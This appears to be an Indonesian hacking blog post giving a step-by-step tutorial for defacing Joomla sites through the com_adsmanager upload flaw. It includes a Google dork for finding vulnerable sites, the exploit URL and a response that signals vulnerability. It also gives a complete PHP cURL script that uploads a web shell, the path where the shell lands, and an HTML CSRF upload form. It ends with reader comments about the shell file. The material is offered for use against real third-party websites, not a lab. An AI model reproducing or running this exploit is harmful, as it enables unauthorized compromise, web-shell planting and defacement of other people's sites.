Wednesday, 8 July 2015

Tutorial Deface Dengan Com_Adsmanager



Hello ketemu lagi sama Nuenomaru
hahaha, Baru sempet posting lagi.
Kali ini Nuenomaru akan Share Tutorial yang lagi booming dikalangan para defacer/pepeser/colizer :v , yaitu Deface Dengan Com_Adsmanager menggunakan XAMPP + Bonus CSRF Upload nya juga


langsung aja intip caranya:

Dork : inurl:/index.php?option=com_adsmanager/ site:/uk/com/org 
(kembangin lagi bro, biar banyak dpt web yg verawan and vuln)


- Masukan Dork di google, dan lalu pilih 1 web

Exploit: /index.php?option=com_adsmanager&task=upload&tmpl=component

- pastekan Exploit diatas ke web target yang baru sobat pilih..
contoh: www.target.co.li//index.php?option=com_adsmanager&task=upload&tmpl=component

Tanda vuln :{"jsonrpc" : "2.0", "result" : null, "id" : "id","tmpfile" : "_5"}
(atau kurang lebih seperti di gambar)





Save source code php dibawah:

<?php

$url = "target/index.php?option=com_adsmanager&task=upload&tmpl=component"; // put URL Here
$post = array
(
"file" => "@shell.jpg",
"name" => "shell.php"
);
$ch = curl_init ("$url");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo $data;


?>

target dan shell ganti dgn url web target sobat, dan nama shell milik sobat.
lalu save dgn ekstensi php, di folder /XAMPP/PHP/ yang sudah terinstall di laptop kalian masing2.
lalu copy juga file shell sobat di folder /XAMPP/PHP/.

- Lalu jika sudah di save, aktifkan apache pada XAMPP
- lalu buka CMD dan ketikan.

cd C:/xampp/php
php namasourcecodeanda.php

- Jika muncul akan keluar nama shell sobat
(kurang lebihnya seperti digambar)




- Acces Shell: target.co.li/tmp/plupload/namashellsobat.php




Jika sudah masuk ke shell sobat, seterah deh mau diapain

#Script CSRF Upload :

<form method="POST" action="TARGET/index.php?option=com_adsmanager&task=upload&tmpl=component"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>


*save dengan ekstensi .html (contoh.html)
*klik ~> pilih shell sobat ~> upload
*letak shell juga sama seperti contoh diatas 

Okeh Sekian tutorial artikel yang saya bahas kali ini. 
Bila ada kesalahan dari Nue mohon maaf kak 
Bila ada yang ingin di tanyakan kirim saja ke wall fanspage kami: TKJ CYBER ART 
bila ada kritikan atau saran juga boleh kak.
Happy Joomla Hacked ~



Source and Thanks to: Forum INCEF




./Nuenomaru




Nuenomaru just an illusion in Cyber World













Visit and follow :

FP         : TKJ Cyber Art
G+         TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2

5 comments

cek dlu koneksi agan...
masalahnya di kami, gambar masih jozz kok..
kami meriksa make 2 laptop dan 2 sumber wifi yg berbeda,, masih muncul kok gambarnya :3

#Nuenomaru

file nya harus ekstentsi jpg ?

di source code nya,"file" =>"@shell.jpg"

itu tetap @shell.jpg ya? atau di ganti dengan @shell.php ??


EmoticonEmoticon